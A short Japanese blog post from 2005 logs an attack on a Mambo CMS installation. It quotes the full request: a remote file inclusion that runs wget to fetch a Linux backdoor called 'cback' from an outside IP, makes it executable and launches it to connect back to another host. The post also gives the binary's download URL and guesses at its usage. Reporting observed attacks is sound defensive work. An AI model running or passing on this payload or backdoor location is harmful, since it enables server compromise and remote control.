SSブログ
Excelの脆弱性をオークション(eBa..SH902i携帯プッシュ・トゥ・トーク ブログトップ

Mambo?の脆弱性への攻撃 [攻撃]

Mamboってのに対するPHPの脆弱性を付いた攻撃が来ていました。

/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|

バックドアっぽいcbackというツールはダウンロード可能でした。Linuxの実行ファイルです。
http://216.103.82.214/cback
使い方は、
./cback <接続許可ホスト> <待ちうけポート> でしょうね。 http://news.mamboserver.com/index.php?option=com_content&task=view&id=2144&Itemid=2


2005-12-13 19:57  コメント(0)  トラックバック(0) 
共通テーマ:パソコン・インターネット

コメント 0

コメントを書く

お名前:[必須]
URL:
コメント:
画像認証:
下の画像に表示されている文字を入力してください。

トラックバック 0

Excelの脆弱性をオークション(eBa..SH902i携帯プッシュ・トゥ・トーク ブログトップ

この広告は前回の更新から一定期間経過したブログに表示されています。更新すると自動で解除されます。